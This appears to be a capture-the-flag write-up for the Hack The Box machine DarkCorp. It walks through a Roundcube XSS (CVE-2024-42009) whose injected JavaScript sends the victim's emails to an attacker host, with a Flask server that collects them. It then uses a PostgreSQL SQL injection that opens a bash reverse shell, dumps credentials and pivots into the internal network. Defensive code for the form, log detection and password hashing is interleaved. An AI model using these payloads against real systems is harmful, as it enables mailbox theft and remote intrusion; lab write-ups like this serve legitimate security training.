DarkCorp
1. User
1.1. Port scan
┌──(root㉿kali)-[~/Desktop/htb/Scepter]
└─# nmap 10.10.11.54 -p- --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-08 12:18 EDT
Nmap scan report for 10.10.11.54
Host is up (0.44s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 18.20 seconds
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 127 OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 33:41:ed:0a:a5:1a:86:d0:cc:2a:a6:2b:8d:8d:b2:ad (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPM91a70VJCxg10WFerhkQv207077raOCX9rTMPBeEbHqGHO954XaFtpqjoofHOQWi2syh7IoOV5+APBOoJ60k0=
| 256 04:ad:7e:ba:11:0e:e0:fb:d0:80:d3:24:c2:3e:2c:c5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHquJFnMIhX9y8Ea87tDtRWPtxThlpE2Y1WxGzsyvQQM
80/tcp open http syn-ack ttl 127 nginx 1.22.1
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.22.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.34 seconds
Raw packets sent: 6 (240B) | Rcvd: 3 (116B)
Only ports 22 and 80 are open; interesting.
1.2. web
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# curl 10.10.11.54
<meta http-equiv="refresh" content="0; url=http://drip.htb/" />
Configure the hosts file.
This is some kind of mail system; first register an account and log in.
If the login fails, add $IP mail.drip.htb to the hosts file as well.
Clicking the About button in the bottom-left corner gives the relevant version information.
Roundcube Webmail is a free and open-source, browser-based IMAP email client.
You can find its historical vulnerabilities at https://www.cvedetails.com/vendor/8905/
I noticed that a code execution vulnerability from 2025 exists, but that should be an unintended path; I will demonstrate how to exploit it in the Beyond Root section.
From the emails we learn one user's email address.
At the bottom of the page there is a contact form where feedback can be submitted.
Intercepting the request shows that both the recipient and the content type can be changed.
I can try sending an email to myself.
I successfully received the email from myself; the body carries some appended security hints ("this may be a phishing email").
And I learned the address of a security engineer: bcase@drip.htb
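The two client-controlled fields just noted (recipient and content type) are the root of the problem, so here is an added illustration of the fix; this is not code from the DarkCorp application or from this writeup. The first handler reproduces the weakness seen in the captured POST (the field names name, email, message, content and recipient match that request), the second fixes the destination mailbox server-side and always sends text/plain. SUPPORT_ADDRESS and the function names are assumptions.

```python
from email.message import EmailMessage
from email.utils import parseaddr
from urllib.parse import parse_qs

# Assumed server-side constant: the only mailbox the form may ever deliver to.
SUPPORT_ADDRESS = "support@drip.htb"


def _form_fields(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into single values."""
    return {key: values[0] for key, values in parse_qs(body).items()}


def build_contact_message_vulnerable(body: str) -> EmailMessage:
    """Reproduces the weakness seen in the captured request: the client
    picks the recipient and whether the body is delivered as text/html."""
    form = _form_fields(body)
    msg = EmailMessage()
    msg["From"] = SUPPORT_ADDRESS
    msg["To"] = form.get("recipient", SUPPORT_ADDRESS)   # attacker-chosen
    msg["Subject"] = "Website contact form"
    subtype = "html" if form.get("content") == "html" else "plain"
    msg.set_content(form.get("message", ""), subtype=subtype)
    return msg


def build_contact_message_hardened(body: str) -> EmailMessage:
    """Same form, but recipient and content type are decided server-side
    and the visitor's address is validated before it is used as Reply-To."""
    form = _form_fields(body)
    _, reply_to = parseaddr(form.get("email", ""))
    if "@" not in reply_to or any(ch in reply_to for ch in "\r\n"):
        raise ValueError("invalid reply address")
    msg = EmailMessage()
    msg["From"] = SUPPORT_ADDRESS
    msg["To"] = SUPPORT_ADDRESS          # never taken from the request
    msg["Reply-To"] = reply_to
    msg["Subject"] = "Website contact form"
    # Always text/plain: any markup in the message is delivered inert, so the
    # recipient's mail client has nothing to render even if its HTML
    # sanitizer has a bug of its own.
    name = form.get("name", "")[:200]
    text = form.get("message", "")[:5000]
    msg.set_content(f"Name: {name}\n\n{text}")
    return msg
```

With the hardened handler the form can still reach the support mailbox, but it can no longer be turned into a relay that delivers arbitrary HTML to arbitrary internal users.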
1.2.1. CVE-2024-42009 Roundcube XSS
Roundcube
Looking through the 2024 CVEs, I found that an exploit for CVE-2024-42009 has been made public.
Vulnerability description: allows a remote attacker to steal and send a victim's emails via a crafted email message that abuses a desanitization issue in the message_body() function in program/actions/mail/show.php.
1.2.1.1. PoC construction
A PoC is provided beneath the vulnerability entry:
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=alert(origin) foo=bar">
Foo
</body>
Because the target site sets HttpOnly, I can't steal the cookie.
0xdf's writeup offers a nice way to use this: load an external JS file. The benefit is that we don't have to keep resending requests to tweak the payload; we only edit script.js and re-open the email.
var script = document.createElement('script');
script.src = 'http://10.10.14.86/script.js';
document.head.appendChild(script);
Here the built-in JS function atob() (ASCII to Binary) is used to avoid formatting problems.
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=eval(atob('dmFyIHNjcmlwdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpOwpzY3JpcHQuc3JjID0gJ2h0dHA6Ly8xMC4xMC4xNC44Ni9zY3JpcHQuanMnOwpkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKHNjcmlwdCk7')) foo=bar">
Foo
</body>
atob() is a built-in JavaScript function that decodes a Base64 string.
Send an email with this payload to myself.
When I view the email, I can see a request for my script.js:
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.14.86 - - [17/Jan/2026 09:08:09] "GET /script.js HTTP/1.1" 200 -
10.10.14.86 - - [17/Jan/2026 09:08:09] "GET /script.js HTTP/1.1" 200 -
10.10.14.86 - - [17/Jan/2026 09:08:10] "GET /script.js HTTP/1.1" 200 -
Now our JS gets loaded. The next step is to have it load a malicious JS file for exploitation.
I noticed that every email has an incrementing uid, so I can try iterating over uids to fetch other users' emails.
Following the payload provided by 0xdf, use the following script.js:
// Fetch message uids 1..15 from the viewer's inbox and post each body,
// base64-encoded, back to the collector
for (let i = 1; i <= 15; i++) {
    fetch(`http://mail.drip.htb/?_task=mail&_action=show&_uid=${i}&_mbox=INBOX&_extwin=1`, {mode: 'no-cors'})
        .then((resp) => resp.text())
        .then((text) => fetch(`http://10.10.14.86/?id=${i}&exfil=` + btoa(text))
    )
}
Then receive the data with the following Python script:
from flask import Flask, request, send_file
import base64
import logging

app = Flask(__name__)
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)


@app.route('/')
def index():
    # Parse the raw query string by hand so '+' in the base64 survives
    query_string = request.query_string.decode('utf-8')
    mid = None
    exfil = None
    for param in query_string.split('&'):
        if '=' in param:
            key, value = param.split('=', 1)
            if key == 'id':
                mid = value
            elif key == 'exfil':
                exfil = value
    if exfil is None:
        # plain GET / without data: nothing to write
        return 'Request received'
    decoded = base64.b64decode(exfil)
    if b'SERVER ERROR!' not in decoded:
        fn = f'bcase_{mid}.html'
        with open(fn, 'wb') as f:
            f.write(decoded)
        print(f'Wrote email to {fn}')
    return 'Request received'


@app.route('/script.js')
def serve_script():
    try:
        return send_file('script.js', mimetype='application/javascript')
    except FileNotFoundError:
        return 'File not found', 404


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80, debug=False)
PS: you can also use beef-xss to carry out the XSS attack.
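From the defender's side, the script.js loop above leaves a distinctive trace in the webmail access log: one client requesting _action=show for many different _uid values within a couple of seconds. The detector below is an added example, not part of this writeup or of Roundcube. It parses nginx combined-format lines (the sample lines are constructed) and flags any client that opens more distinct messages in a short sliding window than a person plausibly would; the log format, the window and the threshold are assumptions to tune for a real deployment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlparse

# nginx "combined" log format (assumed for the webmail vhost)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample: a human reading two messages twenty minutes apart,
# and a second client pulling eight different uids within three seconds.
SAMPLE_ACCESS_LOG = [
    '172.16.20.1 - - [18/Jan/2026:08:55:12 +0000] "GET /?_task=mail&_action=show&_uid=42&_mbox=INBOX HTTP/1.1" 200 6011 "http://mail.drip.htb/?_task=mail" "Mozilla/5.0"',
    '10.0.50.10 - - [18/Jan/2026:09:08:09 +0000] "GET /?_task=mail&_action=show&_uid=3&_mbox=INBOX&_extwin=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '10.0.50.10 - - [18/Jan/2026:09:08:09 +0000] "GET /?_task=mail&_action=show&_uid=1&_mbox=INBOX&_extwin=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '10.0.50.10 - - [18/Jan/2026:09:08:09 +0000] "GET /?_task=mail&_action=show&_uid=2&_mbox=INBOX&_extwin=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '10.0.50.10 - - [18/Jan/2026:09:08:10 +0000] "GET /?_task=mail&_action=show&_uid=5&_mbox=INBOX&_extwin=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '10.0.50.10 - - [18/Jan/2026:09:08:10 +0000] "GET /?_task=mail&_action=show&_uid=4&_mbox=INBOX&_extwin=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '10.0.50.10 - - [18/Jan/2026:09:08:10 +0000] "GET /?_task=mail&_action=show&_uid=6&_mbox=INBOX&_extwin=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '10.0.50.10 - - [18/Jan/2026:09:08:11 +0000] "GET /?_task=mail&_action=show&_uid=8&_mbox=INBOX&_extwin=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '10.0.50.10 - - [18/Jan/2026:09:08:11 +0000] "GET /?_task=mail&_action=show&_uid=7&_mbox=INBOX&_extwin=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '10.0.50.10 - - [18/Jan/2026:09:08:12 +0000] "GET /?_task=mail&_action=list&_mbox=INBOX HTTP/1.1" 200 1200 "-" "Mozilla/5.0"',
    'this line is not in combined format',
    '172.16.20.1 - - [18/Jan/2026:09:15:40 +0000] "GET /?_task=mail&_action=show&_uid=7&_mbox=INBOX HTTP/1.1" 200 4100 "http://mail.drip.htb/?_task=mail" "Mozilla/5.0"',
]


def parse_line(line: str):
    """Parse one access-log line; return None for lines in another format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["query"] = {k: v[0] for k, v in parse_qs(urlparse(rec["path"]).query).items()}
    return rec


def find_mass_message_reads(lines, window_seconds=30, min_uids=5):
    """Return [(client_ip, sorted uids)] for clients that opened at least
    min_uids distinct messages (_task=mail&_action=show) inside any
    window_seconds-wide sliding window."""
    reads = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        q = rec["query"]
        if q.get("_task") == "mail" and q.get("_action") == "show" and "_uid" in q:
            reads[rec["ip"]].append((rec["ts"], q["_uid"]))
    window = timedelta(seconds=window_seconds)
    alerts = []
    for ip, events in reads.items():
        events.sort()
        best, start = set(), 0
        for end in range(len(events)):
            # shrink the window from the left until it spans <= window_seconds
            while events[end][0] - events[start][0] > window:
                start += 1
            uids = {uid for _, uid in events[start:end + 1]}
            if len(uids) > len(best):
                best = uids
        if len(best) >= min_uids:
            alerts.append((ip, sorted(best, key=int)))
    return alerts
```

Run over the constructed sample, only the 10.0.50.10 client is reported. Because the fetches are issued by the victim's own browser with the victim's session, the source address is the victim's workstation, not the attacker's; the alert therefore says "this user's session is being driven", and the response is to invalidate that session and look at the message that was open when the burst started.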
1.2.1.2. Email theft
Then send an email carrying the malicious payload to the administrator bcase@drip.htb:
POST /contact HTTP/1.1
Host: drip.htb
Content-Length: 392
Cache-Control: max-age=0
Origin: http://drip.htb
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://drip.htb/index
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: session=eyJfZnJlc2giOmZhbHNlLCJjc3JmX3Rva2VuIjoiNjJiZDUzZTBjNDk5ZWYwYWZhYTc2NTlkOTkzNTA2NmZmNjgzNjQxZSJ9.aWsemA.GfmjmwXHe0ripuWdQ-SFt4MVw0s
Connection: keep-alive
name=123&email=123%40123.com&message=<body+title%3d"bgcolor%3dfoo"+name%3d"bar+style%3danimation-name%3aprogress-bar-stripes+onanimationstart%3deval(atob('dmFyIHNjcmlwdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpOwpzY3JpcHQuc3JjID0gJ2h0dHA6Ly8xMC4xMC4xNC44Ni9zY3JpcHQuanMnOwpkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKHNjcmlwdCk7'))+foo%3dbar">
++Foo
</body>&content=html&recipient=bcase@drip.htb
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# python app.py
* Serving Flask app 'app'
* Debug mode: off
Wrote email to bcase_2.html
Wrote email to bcase_1.html
Wrote email to bcase_3.html
Shortly afterwards I received the administrator's mailbox. It only contains three valid emails.
One of them is useful: it mentions an Analytics panel at dev-a3f1-01.drip.htb.
On the login page, request a password reset, then repeat the operation above to retrieve the password-change URL.
Then change the password and you can log in.
1.3. SQL injection
The page lets me perform a query, and whatever I enter produces an error.
From the error message I can tell that my input type is wrong: it expects a string type and I supplied a numeric type.
And stacked injection is enabled:
'123';select version();
The target has some safety mechanisms enabled that block a few high-risk statements, such as COPY.
You can use the tricks at https://swisskyrepo.github.io/PayloadsAllTheThings/SQL%20Injection/PostgreSQL%20Injection/#table-dump-time-based to bypass them.
'';DO $$ DECLARE cmd text; BEGIN cmd := CHR(67) || 'OPY (SELECT '''') to program ''bash -c "bash -i >& /dev/tcp/10.10.14.86/4444 0>&1"'''; EXECUTE cmd; END $$;
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# penelope -p 4444
[+] Listening for reverse shells on 0.0.0.0:4444 → 127.0.0.1 • 192.168.8.18 • 192.168.10.14 • 192.168.1.3 • 172.18.0.1 • 172.17.0.1 • 10.10.14.86
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from drip~10.129.232.7-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /root/.penelope/sessions/drip~10.129.232.7-Linux-x86_64/2026_01_18-04_17_59-336.log 📜
──────────────────────────────────────────────────────────────────────────────────────────────────────────────
postgres@drip:/var/lib/postgresql/15/main$ whoami
postgres
postgres@drip:/var/lib/postgresql/15/main$
postgres@drip:/var/lib$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:15:5d:84:03:02 brd ff:ff:ff:ff:ff:ff
inet 172.16.20.3/24 brd 172.16.20.255 scope global eth0
valid_lft forever preferred_lft forever
postgres@drip:/var/lib$ ss -tunlp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 0.0.0.0:55953 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:5353 0.0.0.0:*
udp UNCONN 0 0 127.0.0.1:323 0.0.0.0:*
udp UNCONN 0 0 [::]:5353 [::]:*
udp UNCONN 0 0 [::]:58666 [::]:*
udp UNCONN 0 0 [::1]:323 [::]:*
tcp LISTEN 0 5 127.0.0.1:34281 0.0.0.0:*
tcp LISTEN 0 100 127.0.0.1:993 0.0.0.0:*
tcp LISTEN 0 2048 127.0.0.1:8000 0.0.0.0:*
tcp LISTEN 0 2048 127.0.0.1:8001 0.0.0.0:*
tcp LISTEN 0 244 127.0.0.1:5432 0.0.0.0:* users:(("postgres",pid=567,fd=5))
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 100 127.0.0.1:143 0.0.0.0:*
tcp LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
tcp LISTEN 0 100 127.0.0.1:587 0.0.0.0:*
tcp LISTEN 0 10 127.0.0.1:32835 0.0.0.0:*
tcp LISTEN 0 100 127.0.0.1:25 0.0.0.0:*
tcp LISTEN 0 128 [::]:22 [::]:*
tcp LISTEN 0 511 [::]:80 [::]:*
From the IP address it looks like I'm inside a container, but considering that the target is a Windows machine, we are more likely inside a virtual machine rather than Docker.
1.4. shell as VICTOR.R
1.4.1. pgsql
postgres=# \l
List of databases
Name | Owner | Encoding | Collate | Ctype | ICU Locale | Locale Provider | Access privileges
-----------+---------------+----------+-------------+-------------+------------+-----------------+---------------------------------
dripmail | dripmail_dba | UTF8 | en_US.UTF-8 | en_US.UTF-8 | | libc | =Tc/dripmail_dba +
| | | | | | | dripmail_dba=CTc/dripmail_dba
postgres | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | | libc |
roundcube | roundcubeuser | UTF8 | en_US.UTF-8 | en_US.UTF-8 | | libc | =Tc/roundcubeuser +
| | | | | | | roundcubeuser=CTc/roundcubeuser
template0 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | | libc | =c/postgres +
| | | | | | | postgres=CTc/postgres
template1 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | | libc | =c/postgres +
| | | | | | | postgres=CTc/postgres
(5 rows)
postgres=# \c dripmail
You are now connected to database "dripmail" as user "postgres".
dripmail=# \dt
List of relations
Schema | Name | Type | Owner
--------+--------+-------+----------
public | Admins | table | postgres
public | Users | table | postgres
(2 rows)
dripmail=# select * from "Admins";
id | username | password | email
----+----------+----------------------------------+----------------
1 | bcase | 21232f297a57a5a743894a0e4a801fc3 | bcase@drip.htb
(1 row)
dripmail=# select * from "Users";
id | username | password | email | host_header | ip_address
------+----------+----------------------------------+-------------------+-------------------------------------------------------------------------------------------------------------------------------+-------------
5001 | support | d9b9ecbf29db8054b21f303072b37c4e | support@drip.htb | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 | 10.0.50.10
5002 | bcase | 1eace53df87b9a15a37fdc11da2d298d | bcase@drip.htb | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 | 10.0.50.10
5003 | ebelford | 0cebd84e066fd988e89083879e88c5f9 | ebelford@drip.htb | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 | 10.0.50.10
5004 | admin | 4297f44b13955235245b2497399d7a93 | admin@drip.htb | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 | 172.16.20.1
(4 rows)
Several MD5 hashes can be obtained here:
21232f297a57a5a743894a0e4a801fc3
d9b9ecbf29db8054b21f303072b37c4e
1eace53df87b9a15a37fdc11da2d298d
0cebd84e066fd988e89083879e88c5f9
4297f44b13955235245b2497399d7a93
Two of them crack, but both are passwords I set myself.
1.4.2. Information gathering
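The reason any of these hashes crack at all is that the application stores unsalted MD5: every account with the same password gets the same 32-character value, and a lookup table built once works against all of them. As an added example (my code, not the dripmail application's), the functions below put that scheme next to a salted, slow PBKDF2-HMAC-SHA256 hash using only the standard library; the storage format string and the round count are my choices.

```python
import hashlib
import hmac
import secrets

PBKDF2_ROUNDS = 600_000   # work factor; raise it as hardware gets faster


def md5_hex(password: str) -> str:
    """Unsalted MD5 as stored in the Users/Admins tables: microseconds to
    compute and identical for every account that shares the password, so a
    single precomputed table cracks all of them at once."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def pbkdf2_hash(password: str, salt: bytes = b"", rounds: int = PBKDF2_ROUNDS) -> str:
    """Salted, slow hash. Format: pbkdf2_sha256$<rounds>$<salt hex>$<dk hex>.
    A fresh random salt per user means equal passwords no longer look equal."""
    salt = salt or secrets.token_bytes(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, rounds)
    return f"pbkdf2_sha256${rounds}${salt.hex()}${dk.hex()}"


def pbkdf2_verify(password: str, stored: str) -> bool:
    """Recompute with the stored salt and rounds; compare in constant time.
    Any malformed record verifies as False instead of raising."""
    try:
        algo, rounds, salt_hex, dk_hex = stored.split("$")
        if algo != "pbkdf2_sha256":
            return False
        dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(rounds))
    except ValueError:
        return False
    return hmac.compare_digest(dk.hex(), dk_hex)
```

The rounds are embedded in the stored string so that old records keep verifying after the default is raised; a login path can re-hash a user's password with the new setting the next time it verifies successfully.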
postgres@drip:/tmp$ cat /etc/krb5.conf
[libdefaults]
default_realm = DARKCORP.HTB
dns_lookup_realm = true
dns_lookup_kdc = true
[realms]
DARKCORP.HTB = {
kdc = darkcorp.htb
admin_server = darkcorp.htb
}
[domain_realm]
postgres@drip:/var/lib/postgresql/.gnupg$ ps -ef |grep sss
root 342 1 0 Jan17 ? 00:00:00 /usr/sbin/sssd -i --logger=files
root 530 342 0 Jan17 ? 00:00:03 /usr/libexec/sssd/sssd_be --domain darkcorp.htb --uid 0 --gid 0 --logger=files
root 583 342 0 Jan17 ? 00:00:04 /usr/libexec/sssd/sssd_nss --uid 0 --gid 0 --logger=files
root 584 342 0 Jan17 ? 00:00:01 /usr/libexec/sssd/sssd_pam --uid 0 --gid 0 --logger=files
root 585 342 0 Jan17 ? 00:00:01 /usr/libexec/sssd/sssd_pac --uid 0 --gid 0 --logger=files
postgres 189795 149967 0 05:16 pts/3 00:00:00 grep sss
The machine has krb5.conf configured and SSSD is running, which means it is a domain-joined Linux host, possibly FreeIPA.
postgres@drip:/var/www/html/dashboard$ cat .env
# True for development, False for production
DEBUG=False
# Flask ENV
FLASK_APP=run.py
FLASK_ENV=development
# If not provided, a random one is generated
# SECRET_KEY=<YOUR_SUPER_KEY_HERE>
# Used for CDN (in production)
# No Slash at the end
ASSETS_ROOT=/static/assets
# If DB credentials (if NOT provided, or wrong values SQLite is used)
DB_ENGINE=postgresql
DB_HOST=localhost
DB_NAME=dripmail
>>>> DB_USERNAME=dripmail_dba
>>>> DB_PASS=2Qa2SsBkQvsc
DB_PORT=5432
SQLALCHEMY_DATABASE_URI = 'postgresql://dripmail_dba:2Qa2SsBkQvsc@localhost/dripmail'
SQLALCHEMY_TRACK_MODIFICATIONS = True
SECRET_KEY = 'GCqtvsJtexx5B7xHNVxVj0y2X0m10jq'
MAIL_SERVER = 'drip.htb'
MAIL_PORT = 25
MAIL_USE_TLS = False
MAIL_USE_SSL = False
MAIL_USERNAME = None
MAIL_PASSWORD = None
MAIL_DEFAULT_SENDER = 'support@drip.htb'
The database password can be obtained from /var/www/html/dashboard/.env, but because we are currently the postgres user and peer/ident authentication is in use, we can connect to the database with psql without a password.
postgres@drip:/var/www/html/dashboard$ cat /etc/passwd |grep sh
root:x:0:0:root:/root:/bin/bash
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
>>>> bcase:x:1000:1000:Bryce Case Jr.,,,:/home/bcase:/bin/bash
postgres:x:102:110:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
ebelford:x:1002:1002:Eugene Belford:/home/ebelford:/bin/bash
postgres@drip:/var/www/html/dashboard$ ls /home
bcase ebelford vmail
postgres@drip:/var/www/html/dashboard$ ls /home/ -l
total 12
>>>> drwx------ 7 bcase bcase 4096 Feb 3 2025 bcase
drwxr-xr-x 2 ebelford ebelford 4096 Feb 5 2025 ebelford
drwxr-xr-x 2 vmail vmail 4096 Dec 19 2024 vmail
1.4.3. Internal network discovery
Since there isn't much of value here, I suspect this machine is only meant to serve as our pivot.
I uploaded nmap to do host discovery on the internal network.
postgres@drip:/tmp$ ./nmap -sn 172.16.20.3/24
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2026-01-18 05:23 MST
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for DC-01 (172.16.20.1)
Host is up (0.0097s latency).
Nmap scan report for 172.16.20.2
Host is up (0.017s latency).
Nmap scan report for drip.darkcorp.htb (172.16.20.3)
Host is up (0.0059s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.92 seconds
Three hosts were discovered:
DC-01 (172.16.20.1)
web-01 (172.16.20.2)
drip.darkcorp.htb (172.16.20.3), the current machine
postgres@drip:/tmp$ ./nmap 172.16.20.2
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2026-01-18 05:26 MST
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for 172.16.20.2
Host is up (0.00054s latency).
Not shown: 1152 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open epmap
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 6.22 seconds
postgres@drip:/tmp$ ./nmap 172.16.20.1
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2026-01-18 05:26 MST
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for DC-01 (172.16.20.1)
Host is up (0.0015s latency).
Not shown: 1144 filtered ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
88/tcp open kerberos
135/tcp open epmap
139/tcp open netbios-ssn
389/tcp open ldap
443/tcp open https
445/tcp open microsoft-ds
464/tcp open kpasswd
593/tcp open unknown
636/tcp open ldaps
Nmap done: 1 IP address (1 host up) scanned in 5.05 seconds
postgres@drip:/tmp$
Here I uploaded fscan and scanned again, mainly to check for weak passwords (fscan feels more convenient for this kind of thing).
postgres@drip:/tmp$ ./fscan-eAbbRdOo -h 172.16.20.2/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.16.20.1 is alive
(icmp) Target 172.16.20.3 is alive
(icmp) Target 172.16.20.2 is alive
[*] Icmp alive hosts len is: 3
172.16.20.2:445 open
172.16.20.2:139 open
172.16.20.2:135 open
172.16.20.2:80 open
172.16.20.1:445 open
172.16.20.1:443 open
172.16.20.1:139 open
172.16.20.1:135 open
172.16.20.1:80 open
172.16.20.1:22 open
172.16.20.3:22 open
172.16.20.1:88 open
172.16.20.3:80 open
[*] alive ports len is: 13
start vulscan
[*] WebTitle http://172.16.20.1 code:200 len:64 title:None
[*] WebTitle http://172.16.20.3 code:200 len:64 title:None
[*] NetInfo
[*]172.16.20.2
[->]WEB-01
[->]172.16.20.2
[*] NetInfo
[*]172.16.20.1
[->]DC-01
[->]10.129.232.7
[->]172.16.20.1
[*] NetBios 172.16.20.2 DARKCORP\WEB-01
[*] NetBios 172.16.20.1 [+] DC:DARKCORP\DC-01
[*] WebTitle https://172.16.20.1 code:200 len:703 title:IIS Windows Server
[*] WebTitle http://172.16.20.2 code:200 len:703 title:IIS Windows Server
已完成 11/13 [-] ssh 172.16.20.3:22 root root_123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 11/13 [-] ssh 172.16.20.1:22 root 666666 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
fscan did not find any service with a weak password.
1.4.4. Internal network proxy
Use ligolo-ng to proxy into the internal network.
postgres@drip:/tmp$ ./agent-AVElfFOs -connect 10.10.14.86:11601 -ignore-cert &
[1] 192953
postgres@drip:/tmp$ WARN[0000] warning, certificate validation disabled
INFO[0000] Connection established addr="10.10.14.86:11601"
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# ./proxy -selfcert
INFO[0000] Loading configuration file ligolo-ng.yaml
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
INFO[0000] Listening on 0.0.0.0:11601
INFO[0000] Starting Ligolo-ng Web, API URL is set to: http://127.0.0.1:8080
